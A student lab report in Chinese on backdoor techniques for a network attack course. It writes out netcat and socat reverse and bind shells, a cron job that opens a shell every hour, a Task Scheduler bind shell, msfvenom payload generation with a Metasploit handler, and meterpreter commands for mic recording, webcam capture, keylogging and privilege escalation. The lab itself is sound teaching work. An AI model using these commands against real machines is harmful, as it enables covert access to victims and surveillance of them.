2019-2020-2 20175105王鑫浩 《网络对抗技术》Exp2 后门原理与实践
2019-2020-2 20175105王鑫浩 《网络对抗技术》Exp2 后门原理与实践
1.实验内容
任务一
(1)Linux获得Win Shell
输入
ifconfig
查看到kali的IP地址为192.168.87.132
输入
nc -l -p 5105
在Linux运行监听
windows在命令窗口进入ncat文件目录,输入
ncat.exe -e cmd.exe 192.168.0.10 5303
,使Windows反弹连接Linux
Linux下看到Windows的命令提示,可运行指令
(2)Win获得Linux Shell:
首先在Windows命令窗口中使用
ipconfig
查看主机IP地址 192.168.159.1
windows在ncat.exe文件目录下输入
ncat.exe -l -p 5105
打开windows 监听
Linux反弹连接windows:
nc 192.168.159.1 5105 -e /bin/sh
windows下获得一个linux shell,可运行指令
(3)使用netcat
获取主机操作Shell,cron启动
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
crontab指令增加一条定时任务,"-e"表示编辑。
在kali端输入
crontab -e
,选择第二个编辑器,并添加3 * * * * /bin/netcat 192.168.3.27 5303 -e /bin/sh
后保存退出,表示在每个小时的第3分钟执行后面的那条指令。
定时器设置完成
任务二 使用socat获取主机操作Shell, 任务计划启动
右击
计算机
—>点击计算机管理
->点击任务计划程序
—>点击创建任务
新建触发器
新建操作,在
程序或脚本
中选择socat.exe文件的路径,添加参数中填写tcp-listen:5105 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe
绑定到端口5105,同时把cmd.exe的stderr重定向到stdout上,然后确定
当时间到时,此时可以看到任务的状态为正在运行,同时会弹出一个cmd窗口。
在kali中输入指令
socat - tcp:192.168.159.1:5105
,成功获得了一个shell
任务三
使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali中使用
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.87.132 LPORT=5105 -f exe > 20175105_backdoor.exe
命令生成20175105_backdoor.exe
文件,其中LHOST是Kali的IP
在Windows下执行ncat.exe -lv 5105 > 20175105_backdoor.exe
,使被控主机进入接收文件模式
在kali中执行nc 192.168.159.1 5105 < 20175105_backdoor.exe
MSF打开监听进程
输入msfconsole
进入msf控制台
输入use exploit/multi/handler
设置payload
输入set payload windows/meterpreter/reverse_tcp
使用和生成后门程序时相同的payload
输入set LHOST 192.168.87.132
,设置本地ip
输入set LPORT 5105
设置本地端口
输入show options
查看选项
输入exploit
开始监听
在windows后门文件夹中运行后门程序
在kali端获取Windows的shell,可以输入dir来验证
任务四
使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
使用record_mic
指令获取目标机截获一段音频
使用webcam_snap
指令获取目标机摄像头
使用keyscan_start
和keyscan_dump
指令获取目标机击键记录
使用screenshot
指令获取目标机截图
使用getuid
指令查看当前用户
使用getsystem
指令进行提权操作
3.问题与解决
问题1:任务三传输后门文件时,未能找到文件。
解决:关闭杀毒软件后,即可找到。
4.基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
不慎下载钓鱼网站中的软件,与其他软件捆绑安装等。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
被攻击者自己执行、以及本次实验中使用的任务计划程序等
(3)Meterpreter有哪些给你映像深刻的功能?
截取音频、启动摄像头、提取权限
(4)如何发现自己有系统有没有被安装后门?
答:使用杀毒软件,检查进程、端口使用情况等。
5.实验总结与体会
答:在信息安全技术的课程中已经操作过一次类似实验,二者不同的是,信安更侧重于程序如何隐藏,网络对抗更侧重于其中原理,印象最深刻的是留下后门后,可以任意操作被攻击者的电子产品,Meterpreter的功能之强大,令人咋舌。